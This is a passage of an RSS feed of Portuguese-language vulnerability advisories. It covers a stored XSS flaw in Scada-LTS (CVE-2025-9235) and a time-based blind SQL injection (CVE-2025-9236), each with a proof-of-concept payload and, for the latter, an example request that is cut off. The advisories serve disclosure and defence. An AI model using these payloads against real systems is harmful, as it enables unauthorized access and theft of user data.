	srcset=&amp;#34;/p/cve-2025-9234/image_hu_2229e4ca9efcb897.png 480w, /p/cve-2025-9234/image_hu_92833fb3a512e8e0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;204&amp;#34;
		data-flex-basis=&amp;#34;491px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9235</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9235/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9235/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9235-cross-site-scripting-xss-armazenado-no-endpoint-compound_eventsshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9235: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9235-cross-site-scripting-xss-armazenado-no-endpoint-compound_eventsshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9235: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;Compound-PoC-XSS&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9235/image.png&amp;#34;
	width=&amp;#34;823&amp;#34;
	height=&amp;#34;475&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9235/image_hu_5f30348700829446.png 480w, /p/cve-2025-9235/image_hu_ef6aa04245283b7a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;173&amp;#34;
		data-flex-basis=&amp;#34;415px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9236</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9236/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9236/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9236-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-nm_tipo-do-endpoint-educar_tipo_usuario_lstphp&amp;#34;&amp;gt;CVE-2025-9236: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9236-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-nm_tipo-do-endpoint-educar_tipo_usuario_lstphp&amp;#34;&amp;gt;CVE-2025-9236: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR &amp;amp;#39;EgwO&amp;amp;#39;=&amp;amp;#39;pMdZ
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;examplo-de-requisição&amp;#34;&amp;gt;Examplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-gdscript3&amp;#34; data-lang=&amp;#34;gdscript3&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;GET&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;intranet&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;educar_tipo_usuario_lst&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;php&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;busca&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;S&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nm_tipo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;%20AND&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;%208767%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;3D(SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;%208767%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;20FROM%20PG_SLEEP(10))%20OR%20&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;EgwO&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;%3D&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pMdZ&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;descricao&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nivel&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;HTTP&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;1.1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Host&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;localhost&amp;lt;/span&amp;gt;
